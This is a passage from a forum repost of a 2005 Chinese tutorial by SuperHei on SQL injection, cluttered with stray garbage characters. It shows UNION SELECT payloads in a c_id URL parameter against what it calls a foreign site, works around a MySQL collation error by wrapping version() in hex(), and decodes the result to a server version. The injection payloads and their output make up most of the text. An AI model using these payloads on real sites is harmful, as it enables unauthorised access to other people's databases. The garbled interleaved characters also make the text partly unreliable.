本文作者:SuperHei
( i6 {- V1 J. }! `& J文章性质:原创/ ~: N1 v Z- K' x9 [
发布日期:2005-10-18; C5 b. g5 ~! a1 |
测试个国外的站时:
1 h9 L/ | J2 D# Z0 E7 i( H' Furl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
# ~2 O D9 z. J' `# S返回错误:
3 l( f6 Y+ N+ \( R1 vIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
4 R" w6 |+ J! {; N$ E3 qMySQL Error No. 126' k) M$ L" {* b; D8 {
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
( k: t5 Z( L& s0 @解决办法:转为其他编码如hex。
( i8 r! ^# t" eurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*3 Z N, W1 d8 Y
成功得到hex(version())的值为:5 k; v }# Q0 ]9 o/ X8 b! Z) r Z
342E312E332D62657461# ~ t0 e4 g1 r/ |' f" O: i) o
回Mysql查询下得到:
5 i1 F6 F' X. N4 Lmysql> select 0x342E312E332D62657461;
1 g- d2 m* Q- Y# ^+------------------------+
) ?5 ]7 Y* n! x8 H2 K" `: B| 0x342E312E332D62657461 |
1 C6 h! r$ O4 c, S+------------------------+3 p7 C7 i P8 G+ c" J! O3 t; ]
| 4.1.3-beta |7 S' T# H6 M0 H; {
+------------------------+
/ Y ]& s" n0 p( V1 row in set (0.00 sec)+ G' R" M+ |/ {3 R+ {
: p1 d) z8 _4 [3 f% Y1 P
|
发表于 2012-9-15 14:04:54
收藏
支持
反对